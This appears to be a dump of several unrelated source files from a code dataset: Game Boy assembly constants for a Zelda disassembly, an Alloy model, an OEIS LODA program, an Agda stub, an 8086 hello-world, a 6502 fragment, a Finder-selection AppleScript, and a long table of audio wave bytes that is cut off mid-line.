EQU $4C LINK_ANIMATION_STATE_MOVING_SWIMMING_1_DOWN EQU $4D LINK_ANIMATION_STATE_HOLD_SWIMMING_2 EQU $4E LINK_ANIMATION_STATE_MOVING_SWIMMING_2 EQU $4F LINK_ANIMATION_STATE_UNKNOWN_50 EQU $50 LINK_ANIMATION_STATE_UNKNOWN_51 EQU $51 LINK_ANIMATION_STATE_UNKNOWN_52 EQU $52 LINK_ANIMATION_STATE_UNKNOWN_53 EQU $53 LINK_ANIMATION_STATE_UNKNOWN_54 EQU $54 LINK_ANIMATION_STATE_UNKNOWN_55 EQU $55 LINK_ANIMATION_STATE_UNKNOWN_56 EQU $56 LINK_ANIMATION_STATE_UNKNOWN_57 EQU $57 LINK_ANIMATION_STATE_STANDING_SIDE_SCROLL_LEFT_DOWN EQU $58 LINK_ANIMATION_STATE_WALKING_SIDE_SCROLL_LEFT_DOWN EQU $59 LINK_ANIMATION_STATE_STANDING_SIDE_SCROLL_RIGHT_UP EQU $5B LINK_ANIMATION_STATE_WALKING_SIDE_SCROLL_RIGHT_UP EQU $5C LINK_ANIMATION_STATE_JUMPING_1 EQU $5E LINK_ANIMATION_STATE_JUMPING_2 EQU $5F LINK_ANIMATION_STATE_JUMPING_3 EQU $60 LINK_ANIMATION_STATE_UNKNOWN_61 EQU $61 LINK_ANIMATION_STATE_UNKNOWN_62 EQU $62 LINK_ANIMATION_STATE_UNKNOWN_63 EQU $63 LINK_ANIMATION_STATE_UNKNOWN_64 EQU $64 LINK_ANIMATION_STATE_UNKNOWN_65 EQU $65 LINK_ANIMATION_STATE_UNKNOWN_66 EQU $66 LINK_ANIMATION_STATE_UNKNOWN_67 EQU $67 LINK_ANIMATION_STATE_UNKNOWN_68 EQU $68 LINK_ANIMATION_STATE_UNKNOWN_69 EQU $69 LINK_ANIMATION_STATE_UNKNOWN_6A EQU $6A LINK_ANIMATION_STATE_UNKNOWN_6B EQU $6B LINK_ANIMATION_STATE_GOT_ITEM EQU $6C LINK_ANIMATION_STATE_UNKNOWN_75 EQU $75 LINK_ANIMATION_STATE_NO_UPDATE EQU $FF ; MUSIC [Enumerated] [Hex] MUSIC_NONE EQU $00 MUSIC_TITLE_SCREEN_INTRO EQU $01 MUSIC_MINIGAME EQU $02 MUSIC_GAME_OVER EQU $03 MUSIC_MABE_VILLAGE EQU $04 MUSIC_OVERWORLD EQU $05 MUSIC_MT_TAMARANCH EQU $06 MUSIC_WITCH_HUT EQU $07 MUSIC_RAFT_RIDE_RAPIDS EQU $08 MUSIC_MYSTERIOUS_FOREST EQU $09 MUSIC_HOUSE EQU $0A MUSIC_ANIMAL_VILLAGE EQU $0B MUSIC_FAIRY_FOUNTAIN EQU $0C MUSIC_TITLE_SCREEN EQU $0D MUSIC_BOWWOW_KIDNAPPED EQU $0E MUSIC_SWORD_ACQUIRED EQU $0F MUSIC_TOOL_ACQUIRED EQU $10 MUSIC_FILE_SELECT EQU $11 MUSIC_EGG_MAZE EQU $12 MUSIC_KANALET_CASTLE EQU $13 MUSIC_TAIL_CAVE EQU $14 MUSIC_BOTTLE_GROTTO EQU $15 MUSIC_KEY_CAVERN EQU $16 MUSIC_ANGLERS_TUNNEL EQU $17 MUSIC_BOSS_DEFEATED EQU $18 MUSIC_BOSS_BATTLE EQU $19 MUSIC_INTRO_CUTSCENE EQU $1A MUSIC_INSTRUMENT_ACQUIRED EQU $1B MUSIC_LINK_AWAKENS EQU $1C MUSIC_SWORD_SEARCH EQU $1D MUSIC_DREAMING EQU $1E MUSIC_SOUTHERN_SHRINE EQU $1F MUSIC_INSTRUMENT_FULL_MOON_CELLO EQU $20 MUSIC_2D_UNDERGROUND EQU $21 MUSIC_OWL EQU $22 MUSIC_FINAL_BOSS EQU $23 MUSIC_DREAM_SHRINE_BED EQU $24 MUSIC_HEART_CONTAINER_ACQUIRED EQU $25 MUSIC_COMMON_CAVE EQU $26 MUSIC_POWERUP_ACQUIRED EQU $27 MUSIC_INSTRUMENT_CONCH_HORN EQU $28 MUSIC_INSTRUMENT_SEA_LILY_BELL EQU $29 MUSIC_INSTRUMENT_SURF_HARP EQU $2A MUSIC_INSTRUMENT_WIND_MARIMBA EQU $2B MUSIC_INSTRUMENT_CORAL_TRIANGLE EQU $2C MUSIC_INSTRUMENT_ORGAN_OF_EVENING_CALM EQU $2D MUSIC_INSTRUMENT_THUNDER_DRUM EQU $2E MUSIC_MARIN_SINGING EQU $2F MUSIC_MANBO_MAMBO EQU $30 MUSIC_OVERWORLD_INTRO EQU $31 MUSIC_MR_WRITE_HOUSE EQU $32 MUSIC_PHONE_BOOTH EQU $33 MUSIC_TARIN_BEEHIVE EQU $34 MUSIC_MAMU_SONG EQU $35 MUSIC_MONKEYS_BUILDING_BRIDGE EQU $36 MUSIC_CHRISTINE_HOUSE EQU $37 MUSIC_TOTAKA_SONG_UNUSED EQU $38 MUSIC_TURTLE_ROCK_ENTRANCE_BOSS EQU $39 MUSIC_FISHING_UNDER_BRIDGE EQU $3A MUSIC_CLASSIC_RECEIVED_ITEM EQU $3B MUSIC_TOTAKEKE_NICKNAME_EASTER_EGG EQU $3C MUSIC_ENDING EQU $3D MUSIC_BOWWOW_KIDNAPPED_INTRODUCTION EQU $3E MUSIC_WIND_FISH_AWAKENS EQU $3F MUSIC_RICHARD_MANSION EQU $40 MUSIC_BALLAD_HORN EQU $41 MUSIC_BALLAD_BELL EQU $42 MUSIC_BALLAD_HARP EQU $43 MUSIC_BALLAD_MARIMBA EQU $44 MUSIC_BALLAD_TRIANGLE EQU $45 MUSIC_BALLAD_ORGAN EQU $46 MUSIC_BALLAD_ALL EQU $47 MUSIC_GHOST_HOUSE EQU $48 MUSIC_ACTIVE_POWER_UP EQU $49 MUSIC_LINK_MARIN_DUET EQU $4A MUSIC_CATFISH_MAW EQU $4B MUSIC_WATERFALL_DRAIN EQU $4C MUSIC_MARIN_BEACH_TRANSITION EQU $4D MUSIC_MARIN_BEACH EQU $4E MUSIC_MINIBOSS EQU $50 MUSIC_KANALET_CASTLE_COPY EQU $51 MUSIC_TAIL_CAVE_COPY EQU $52 MUSIC_DREAM_SHRINE EQU $53 MUSIC_EAGLES_TOWER_BOSS_CUTSCENE EQU $54 MUSIC_ROOSTER_REVIVAL EQU $55 MUSIC_SEASHELL_MANSION_SPIRIT EQU $56 MUSIC_CUCCO_HOUSE EQU $57 MUSIC_FACE_SHRINE EQU $58 MUSIC_MEETING_WINDFISH EQU $59 MUSIC_TURTLE_ROCK EQU $5A MUSIC_EAGLE_TOWER EQU $5B MUSIC_GRIM_CREEPER_DIALOG EQU $5C MUSIC_FINAL_BOSS_DIALOG EQU $5D MUSIC_BOSS_WARNING EQU $5E MUSIC_FINAL_BOSS_DEFEATED EQU $5F MUSIC_ZELDA_NICKNAME_EASTER_EGG EQU $60 MUSIC_COLOR_DUNGEON EQU $61 MUSIC_SILENCE EQU $FF ; STATF [Bitmask] [Binary] STATF_LYC EQU %01000000 STATF_MODE10 EQU %00100000 STATF_MODE01 EQU %00010000 STATF_MODE00 EQU %00001000 STATF_LYCF EQU %00000100 STATF_OAM EQU %00000010 STATF_VB EQU %00000001 STATF_HB EQU %00000000 ; UPDATE_BG_TILES [Enumerated] [Hex] UPDATE_BG_TILES_DO_NOTHING EQU $00 UPDATE_BG_TILES_WORLD EQU $01 UPDATE_BG_TILES_DUNGEON_MINIMAP EQU $02 ; binary [Any] [Binary] ; bool [Enumerated] [Decimal] false EQU 0 true EQU 1 ; decimal [Any] [Decimal] ; hex [Any] [Hex]
alloy4fun_models/trashltl/models/7/BLDFMEhPyqfHPhNPp.als	Kaixi26/org.alloytools.alloy	0	3041	<reponame>Kaixi26/org.alloytools.alloy open main pred idBLDFMEhPyqfHPhNPp_prop8 { all f1,f2 : File \| f1->f2 in link implies eventually f2 in Trash } pred __repair { idBLDFMEhPyqfHPhNPp_prop8 } check __repair { idBLDFMEhPyqfHPhNPp_prop8 <=> prop8o }
programs/oeis/069/A069722.asm	neoneye/loda	22	91094	; A069722: Number of rooted unicursal planar maps with n edges and exactly one vertex of valency 1 (unicursal means that exactly two vertices are of odd valency; there is an Eulerian path). ; 0,4,24,160,1120,8064,59136,439296,3294720,24893440,189190144,1444724736,11076222976,85201715200,657270374400,5082890895360,39392404439040,305870434467840,2378992268083200,18531097667174400,144542561803960320,1128808577897594880,8825230699926650880,69067022868991180800,541025012473764249600,4241636097794311716864,33280529382693830393856,261313786264114520129536,2053179749218042658160640,16142240786955645726228480,126985627524051079712997376,999499777931240756450689024,7871060751208520957049176064,62014418039824710570690478080,488819530431559483321913180160,3854691154260297639909943934976,30409230216942348048178446598144,239986357387761233245083956936704,1894629137271799209829610186342400,14962712161018311708397947112652800,118205426072044662496343782189957120,934111171886401723141838669013319680 mov $1,$0 mul $0,2 bin $0,$1 lpb $1 mul $0,2 sub $1,1 lpe div $0,4 mul $0,4
agda-stdlib/src/Data/List/Any/Properties.agda	DreamLinuxer/popl21-artifact	5	27	<gh_stars>1-10 ------------------------------------------------------------------------ -- The Agda standard library -- -- This module is DEPRECATED. Please use -- Data.List.Relation.Unary.Any.Properties directly. ------------------------------------------------------------------------ {-# OPTIONS --without-K --safe #-} module Data.List.Any.Properties where open import Data.List.Relation.Unary.Any.Properties public {-# WARNING_ON_IMPORT "Data.List.Any.Properties was deprecated in v1.0. Use Data.List.Relation.Unary.Any.Properties instead." #-}
Computer_Science/8_Assembly_Level_Programming/p01_helloworld.asm	Soumya14022002/Algos-for-all-Amigos	10	95686	; Comment Line ; Install an 8086 Assembler and run the code ; Resources used: https://www.youtube.com/watch?v=zEuvNYe7WG0 .model tiny .code org 100h ; Code starts with an offset of 100h main proc near mov ah, 09h ; Moving the value of 09h to the register ah mov dx, offset message ; Moving the message to be displayed to register dx. Must end with a $ sign int 21h ; DOS Interrupt. Initiates the process. Done before almost every command mov ah, 4ch ; Moves the value of 4ch to register ah. Function to terminate mov al, 00 int 21h ; Again, using the interrupt to intiate the above 2 lines endp ; Ends the main message db "Hello World! $" ; db data type. Variable name is message. String must be within "" and must end with $ end main ; Ends the program
src/main/fragment/mos6502-common/vwum1=vwum1_plus__word1_vdum2.asm	jbrandwood/kickc	2	245971	clc lda {m1} adc {m2}+2 sta {m1} lda {m1}+1 adc {m2}+3 sta {m1}+1
get_selection.applescript	Bilalh/Scripts	0	1714	<filename>get_selection.applescript #!/usr/bin/env osascript set res to "" tell application "Finder" set paths to the selection repeat with i from 1 to number of items in paths set res to res & " " & quoted form of POSIX path of (item i of paths as alias) end repeat end tell res
data/all_data_files_waves.asm	artrag/voicenc_scc	4	165872	<filename>data/all_data_files_waves.asm<gh_stars>1-10 CODE data1: db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0xFD,0xFF,0xFE,0xFD,0xFB,0xFA,0xFA,0xFB,0xFD,0xFF,0xFF,0xFE,0xFE,0xFF,0xFF,0xFF,0x00,0x02,0x03,0x04,0x04,0x05,0x0B,0x11,0x14,0x10,0x09,0x02,0x02,0xFF,0xFE,0xFE db 0xEF,0xEC,0xE7,0xE4,0xE7,0xEE,0xF5,0xF9,0xFC,0x00,0x06,0x0C,0x10,0x05,0x05,0x06,0x08,0x09,0x09,0x09,0x09,0x09,0x0B,0x12,0x1B,0x1C,0x0E,0xFC,0xF6,0xF8,0xF7,0xF2 db 0xE4,0xF3,0xF5,0xEA,0xE2,0xE8,0xF7,0x05,0x0C,0x0F,0x13,0x15,0x18,0x1A,0x1C,0x19,0x13,0x0B,0x03,0xFF,0x01,0x04,0x03,0x06,0x1D,0x30,0x1E,0xF0,0xD1,0xCD,0xD1,0xD7 db 0xD5,0xEA,0xF7,0xF4,0xEC,0xF0,0xFB,0x04,0x09,0x10,0x1B,0x22,0x25,0x26,0x25,0x21,0x17,0x0D,0x03,0xFE,0xFC,0xFD,0xFC,0x04,0x1B,0x2F,0x21,0xF5,0xD1,0xC5,0xC4,0xC8 db 0xC9,0xDF,0xEE,0xF6,0xFD,0x03,0x07,0x07,0x09,0x11,0x1C,0x25,0x2A,0x2B,0x29,0x21,0x16,0x0A,0x01,0xFC,0xFA,0xF9,0xFE,0x0F,0x22,0x23,0x0C,0xEE,0xD8,0xC7,0xBC,0xBA db 0xC5,0xDA,0xEB,0xF7,0x00,0x07,0x0B,0x0B,0x0D,0x13,0x1C,0x24,0x2A,0x2C,0x2A,0x24,0x19,0x0C,0x01,0xFA,0xF6,0xF5,0xFC,0x0C,0x1D,0x1E,0x0C,0xF4,0xDE,0xCB,0xBC,0xB9 db 0xC7,0xDA,0xEB,0xF5,0xFB,0x01,0x05,0x07,0x09,0x10,0x1A,0x21,0x26,0x28,0x27,0x21,0x17,0x0C,0x03,0xFC,0xFA,0xFA,0xF8,0x06,0x1A,0x22,0x14,0xFA,0xE2,0xD0,0xC2,0xBD db 0xCB,0xE1,0xF3,0xF4,0xEC,0xE9,0xF1,0xFC,0x06,0x0F,0x16,0x1C,0x1F,0x24,0x25,0x23,0x1D,0x14,0x0B,0x02,0xFE,0xFD,0xFF,0xFF,0x0C,0x27,0x2F,0x10,0xE4,0xCA,0xC4,0xC2 db 0xCB,0xE2,0xF4,0xF1,0xE6,0xDD,0xE2,0xF3,0x07,0x13,0x18,0x19,0x1A,0x1E,0x23,0x26,0x25,0x1E,0x12,0x07,0xFF,0x00,0x03,0x02,0xFF,0x16,0x35,0x26,0xF2,0xCC,0xC1,0xC1 db 0xC0,0xD9,0xED,0xED,0xE4,0xDE,0xDE,0xEE,0x07,0x18,0x1C,0x1B,0x1C,0x1E,0x24,0x2A,0x2C,0x25,0x19,0x0B,0x00,0xFE,0x00,0x02,0xFC,0x0A,0x31,0x2B,0xFD,0xD7,0xC5,0xBA db 0xC3,0xD3,0xE2,0xE8,0xE6,0xE0,0xE2,0xF1,0x06,0x15,0x1E,0x1F,0x1E,0x20,0x25,0x29,0x2B,0x26,0x1B,0x0B,0x01,0xFF,0xFF,0xFF,0xFE,0x16,0x2D,0x1C,0xFA,0xDC,0xC2,0xB8 db 0xDC,0xED,0xF1,0xE8,0xDA,0xD7,0xE4,0xFE,0x10,0x1C,0x1B,0x15,0x13,0x19,0x23,0x2A,0x2B,0x21,0x14,0x08,0xFF,0x03,0x06,0x05,0x00,0x1B,0x31,0x19,0xE9,0xCA,0xB8,0xC2 db 0xE7,0xF3,0xF2,0xE3,0xD5,0xD5,0xE5,0xFF,0x14,0x19,0x0F,0x07,0x0A,0x17,0x26,0x2C,0x28,0x1C,0x0F,0x06,0x02,0x08,0x0D,0x0A,0xFD,0x07,0x31,0x2D,0xED,0xBB,0xBC,0xD2 db 0xEF,0xF5,0xF7,0xF0,0xDB,0xCF,0xE0,0xFE,0x11,0x15,0x0F,0x04,0x00,0x0C,0x20,0x2A,0x26,0x1A,0x0E,0x06,0x05,0x06,0x0D,0x0D,0x05,0xF8,0x16,0x3B,0x19,0xC6,0xAB,0xCF db 0xFC,0xF8,0xF2,0xF1,0xDD,0xCB,0xDC,0x00,0x13,0x10,0x09,0xFF,0xFC,0x09,0x20,0x2B,0x24,0x17,0x0E,0x07,0x05,0x09,0x10,0x0D,0x05,0xF9,0x18,0x3F,0x1B,0xC4,0xA8,0xD7 db 0xFB,0xFB,0xED,0xF0,0xE7,0xCC,0xD1,0xF8,0x11,0x0E,0x06,0x02,0xFE,0x03,0x17,0x29,0x28,0x1A,0x10,0x0C,0x08,0x06,0x0E,0x13,0x0D,0xFA,0x08,0x3A,0x32,0xDD,0xA5,0xC9 db 0xFB,0xF9,0xEB,0xEE,0xE4,0xC9,0xCE,0xF6,0x12,0x10,0x06,0x01,0xFE,0x03,0x15,0x28,0x28,0x1C,0x10,0x0C,0x08,0x08,0x12,0x15,0x0B,0xFA,0x0E,0x3F,0x2D,0xD6,0xA6,0xCE db 0x02,0xEB,0xE3,0xEF,0xD8,0xC0,0xD9,0x08,0x16,0x07,0x00,0x03,0x02,0x09,0x1E,0x2E,0x28,0x17,0x0D,0x0B,0x09,0x09,0x15,0x14,0x08,0xF7,0x24,0x4A,0x16,0xB8,0xAC,0xE9 db 0xF2,0xE3,0xE3,0xEE,0xCF,0xB0,0xCC,0xFF,0x0F,0x06,0x06,0x09,0x04,0x09,0x22,0x35,0x30,0x21,0x17,0x10,0x09,0x0C,0x19,0x15,0x07,0xF9,0x2C,0x4B,0x08,0xB3,0xB6,0xEE db 0xEA,0xDB,0xE7,0xEB,0xC2,0xAB,0xCF,0xFC,0x08,0x05,0x0C,0x0B,0x03,0x0C,0x28,0x39,0x33,0x26,0x1D,0x14,0x0B,0x0F,0x1B,0x15,0x06,0xFA,0x32,0x47,0xFD,0xB6,0xBB,0xEC db 0xE0,0xD3,0xE2,0xE6,0xC1,0xA4,0xC6,0xF2,0x02,0x07,0x10,0x0D,0x04,0x0E,0x2A,0x3E,0x3D,0x33,0x28,0x1B,0x10,0x12,0x1F,0x19,0x0B,0xFB,0x29,0x49,0x04,0xBC,0xBA,0xE6 db 0xD2,0xBA,0xD0,0xDC,0xC1,0xA2,0xB7,0xE2,0xF7,0x02,0x10,0x15,0x0C,0x0C,0x24,0x3D,0x45,0x41,0x3A,0x2D,0x1C,0x15,0x21,0x1F,0x13,0x03,0x24,0x49,0x06,0xBF,0xB9,0xDC db 0xD0,0xB6,0xC4,0xDE,0xCA,0xAD,0xB0,0xD1,0xE6,0xF5,0x0E,0x19,0x0F,0x0A,0x19,0x2F,0x3C,0x42,0x40,0x37,0x25,0x17,0x1B,0x22,0x1A,0x0E,0x11,0x43,0x2F,0xDA,0xC1,0xCF db 0xB8,0xBC,0xDC,0xE6,0xCD,0xCB,0xD4,0xD2,0xDF,0x00,0x16,0x13,0x0D,0x12,0x1D,0x27,0x33,0x3B,0x37,0x2A,0x1C,0x12,0x13,0x14,0x0E,0x0B,0x0F,0x40,0x2B,0xDA,0xD7,0xD3 db 0xBA,0xBF,0xD2,0xD4,0xCC,0xCF,0xD1,0xCE,0xDE,0xFE,0x11,0x13,0x15,0x18,0x1B,0x23,0x31,0x38,0x33,0x2B,0x1F,0x11,0x0C,0x10,0x0A,0x04,0x04,0x28,0x30,0xEF,0xE7,0xDF db 0xC4,0xC1,0xC0,0xBF,0xC4,0xC7,0xCB,0xD8,0xEC,0x00,0x0E,0x17,0x1F,0x26,0x2C,0x34,0x3A,0x3B,0x38,0x31,0x25,0x1B,0x16,0x0D,0x07,0x02,0x14,0x22,0x05,0xF7,0xEE,0xD2 db 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0x09,0x12,0x1D,0x23,0x29,0x2D,0x2E,0x2F,0x2B,0x27,0x1F,0x1A,0x12,0x11,0x18,0x19,0x1D,0x0F,0x00,0xEB,0xD7,0xCB,0xC1,0xC1,0xC3,0xC6,0xD2,0xD4,0xD9,0xE2,0xEE,0xFB db 0x07,0x16,0x24,0x2F,0x39,0x40,0x44,0x46,0x42,0x3D,0x35,0x2B,0x22,0x20,0x1D,0x1E,0x18,0x0B,0xFA,0xE6,0xD3,0xC4,0xB6,0xB3,0xB1,0xB4,0xB8,0xBD,0xC6,0xD3,0xE4,0xF6 db 0x39,0x43,0x42,0x37,0x2F,0x26,0x06,0xE3,0xC2,0xB0,0xAE,0xB8,0xD1,0xF0,0x0F,0x2A,0x3D,0x45,0x42,0x35,0x2C,0x23,0x10,0xF1,0xCB,0xB0,0xA7,0xAE,0xC6,0xE6,0x07,0x24 db 0xF4,0x07,0x18,0x28,0x34,0x3F,0x46,0x4B,0x4C,0x4A,0x45,0x3E,0x38,0x31,0x2E,0x27,0x1E,0x13,0x06,0xF6,0xE4,0xD1,0xC0,0xB1,0xA6,0xA0,0xA0,0xA5,0xB0,0xBE,0xCF,0xE1 db 0xF4,0x08,0x1B,0x2D,0x3C,0x48,0x50,0x55,0x56,0x53,0x4B,0x44,0x3B,0x31,0x28,0x1E,0x13,0x08,0xFC,0xEE,0xDE,0xCE,0xBF,0xB2,0xA8,0xA2,0xA1,0xA5,0xAE,0xBB,0xCC,0xDF db 0x05,0x29,0x46,0x55,0x55,0x48,0x33,0x1A,0xFF,0xE6,0xCF,0xBE,0xB6,0xB9,0xC7,0xDF,0xFC,0x3B,0x51,0x57,0x4D,0x39,0x23,0x0D,0xF7,0xE0,0xC9,0xB5,0xAA,0xAD,0xC0,0xDF db 0x04,0x10,0x17,0x1B,0x1B,0x18,0x13,0x0B,0x03,0xFB,0xF3,0xED,0xCD,0xD6,0xE7,0xFB,0x0F,0x1F,0x28,0x2A,0x27,0x1F,0x14,0x08,0xFB,0xEF,0xE4,0xDE,0xDC,0xE1,0xEA,0xF7 db 0xFF,0x00,0x02,0x03,0x03,0x04,0x04,0x03,0x03,0x02,0x02,0x01,0x00,0x00,0xFF,0xFF,0xFF,0xFE,0xFF,0xFF,0x00,0xFE,0xFD,0xFC,0xFB,0xFA,0xFA,0xFA,0xFB,0xFC,0xFD,0xFE db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x01,0x01,0x01,0x01,0xFF,0x00,0x01,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x02,0x00,0xFE,0x00,0x01,0x01,0xFF,0x00,0x01,0xFF,0xFE,0xFF,0x00,0xFF,0xFF,0x01,0x00,0xFE db 0x01,0x03,0x05,0x05,0x06,0x06,0x06,0x07,0x07,0x09,0x0B,0x13,0x11,0x0E,0x0D,0x06,0x01,0xFF,0xFE,0xFD,0xFD,0xFA,0xFA,0xF8,0xF8,0xF9,0xF9,0xF9,0xFB,0xFC,0xFD,0x01 db 0x09,0x16,0x1D,0x23,0x29,0x2B,0x29,0x26,0x23,0x1F,0x1C,0x16,0x1A,0x27,0x1F,0x14,0x08,0xFA,0xEE,0xEE,0xE7,0xDD,0xD5,0xD0,0xCC,0xD0,0xD5,0xDC,0xE3,0xEA,0xF5,0xFF db 0x0C,0x1D,0x2C,0x31,0x30,0x2C,0x28,0x26,0x22,0x21,0x1D,0x17,0x0D,0x15,0x2C,0x23,0x02,0xEC,0xE1,0xDB,0xE4,0xE6,0xD4,0xC1,0xBC,0xC0,0xCD,0xE0,0xEF,0xF2,0xF4,0xFD db 0x0C,0x1C,0x2D,0x38,0x35,0x2E,0x28,0x23,0x1F,0x1E,0x1B,0x12,0x05,0x09,0x27,0x29,0x02,0xE2,0xDB,0xD7,0xDC,0xE5,0xDC,0xC5,0xB9,0xBE,0xCB,0xDF,0xF5,0xFF,0xFD,0x00 db 0x16,0x24,0x31,0x3A,0x3C,0x38,0x2F,0x25,0x1F,0x1C,0x19,0x10,0x09,0x17,0x22,0x11,0xF7,0xE8,0xDA,0xCF,0xCF,0xCF,0xC8,0xC0,0xBC,0xBE,0xC7,0xDA,0xF7,0x02,0x07,0x0D db 0x29,0x35,0x3F,0x46,0x4A,0x4A,0x45,0x3E,0x36,0x2B,0x20,0x17,0x15,0x11,0x09,0x00,0xF8,0xEB,0xDB,0xCC,0xC0,0xB7,0xB2,0xB0,0xB2,0xB9,0xC5,0xD7,0xE9,0xFA,0x0A,0x1B db 0x57,0x53,0x40,0x29,0x16,0x06,0xF3,0xD4,0xB6,0xA4,0xA9,0xC2,0xE5,0x08,0x25,0x39,0x45,0x47,0x3D,0x2D,0x0F,0x02,0xEF,0xCE,0xAD,0x9A,0xA1,0xBF,0xE8,0x12,0x34,0x4C db 0x18,0x24,0x2E,0x36,0x3C,0x44,0x44,0x43,0x3D,0x36,0x2C,0x26,0x22,0x1C,0x17,0x13,0x09,0xFC,0xEC,0xD9,0xC7,0xB9,0xAE,0xA9,0xAA,0xB0,0xBB,0xCA,0xDA,0xEA,0xFB,0x0A db 0x11,0x1C,0x26,0x2E,0x33,0x36,0x36,0x33,0x2C,0x26,0x1B,0x14,0x0C,0x0F,0x12,0x15,0x14,0x0B,0xFC,0xE9,0xD4,0xC4,0xB9,0xB5,0xB8,0xBF,0xCA,0xD7,0xE4,0xF3,0xFF,0x05 db 0x12,0x18,0x20,0x26,0x2C,0x30,0x31,0x2F,0x29,0x1E,0x16,0x0A,0x05,0xFC,0x07,0x0F,0x19,0x1D,0x0E,0xFC,0xDE,0xC3,0xB2,0xAA,0xB4,0xBD,0xCD,0xDD,0xEB,0xF8,0x02,0x0A db 0x09,0x12,0x1D,0x27,0x2E,0x32,0x31,0x2D,0x24,0x1A,0x0F,0x07,0xFF,0xFD,0xFB,0x0C,0x13,0x21,0x13,0x00,0xE5,0xC6,0xB6,0xAD,0xB7,0xC9,0xDA,0xED,0xF5,0xFB,0xFF,0x02 db 0x09,0x16,0x26,0x2F,0x36,0x36,0x33,0x2C,0x21,0x15,0x0E,0x03,0x01,0xFC,0xFE,0x13,0x12,0x22,0x0D,0xF9,0xDD,0xBE,0xB7,0xAF,0xC2,0xD2,0xE2,0xEF,0xF0,0xF4,0xF5,0xFD db 0x0A,0x1A,0x27,0x32,0x37,0x3A,0x38,0x33,0x2D,0x21,0x16,0x0D,0x02,0xFF,0xF7,0x09,0x0C,0x16,0x0F,0xF7,0xE4,0xC6,0xBF,0xB7,0xC0,0xCB,0xD2,0xDA,0xDC,0xE4,0xF0,0xFE db 0x1A,0x27,0x2F,0x37,0x3C,0x40,0x3F,0x3A,0x30,0x21,0x13,0x06,0xFD,0xF4,0xF2,0xFD,0x01,0x0B,0xFC,0xF4,0xDF,0xD6,0xC8,0xC3,0xC7,0xC6,0xCB,0xCB,0xD4,0xE3,0xF6,0x0B db 0x14,0x22,0x2F,0x39,0x41,0x46,0x46,0x40,0x35,0x26,0x17,0x08,0xFD,0xF2,0xEB,0xF0,0xF6,0xFF,0xFB,0xF5,0xE8,0xE0,0xD6,0xD2,0xCD,0xCC,0xC9,0xC9,0xCF,0xDC,0xF0,0x03 db 0x0A,0x1A,0x2D,0x39,0x42,0x47,0x49,0x43,0x3A,0x2B,0x1D,0x0D,0x01,0xF3,0xEE,0xED,0xF5,0xF5,0xF6,0xEF,0xEB,0xE2,0xDC,0xD4,0xD0,0xCB,0xC9,0xC9,0xCF,0xDA,0xEA,0xFA db 0x09,0x1A,0x28,0x34,0x3D,0x42,0x44,0x41,0x3A,0x31,0x26,0x1A,0x0C,0x03,0xFE,0xFC,0xFB,0xF9,0xF5,0xF1,0xE8,0xDE,0xD7,0xCE,0xC7,0xC3,0xC1,0xC4,0xCC,0xD9,0xE8,0xF8 db 0x0D,0x1E,0x2D,0x39,0x42,0x47,0x48,0x45,0x3E,0x35,0x29,0x20,0x13,0x08,0x01,0xFC,0xF8,0xF5,0xF2,0xED,0xE5,0xDB,0xD1,0xC8,0xC0,0xBB,0xBB,0xC0,0xCA,0xD7,0xE8,0xFA db 0x0A,0x1A,0x29,0x36,0x3F,0x45,0x46,0x43,0x3D,0x33,0x27,0x1A,0x0E,0x04,0xFC,0xF5,0xF1,0xED,0xEA,0xE6,0xE1,0xDB,0xD5,0xD0,0xCB,0xC8,0xC9,0xCD,0xD5,0xE0,0xE8,0xF8 db 0x08,0x17,0x24,0x2F,0x38,0x3D,0x3E,0x3C,0x36,0x2D,0x22,0x16,0x0B,0x00,0xF8,0xF1,0xEB,0xE8,0xE8,0xE5,0xE2,0xDE,0xDB,0xD7,0xD4,0xD2,0xD2,0xD4,0xDA,0xE2,0xED,0xFA db 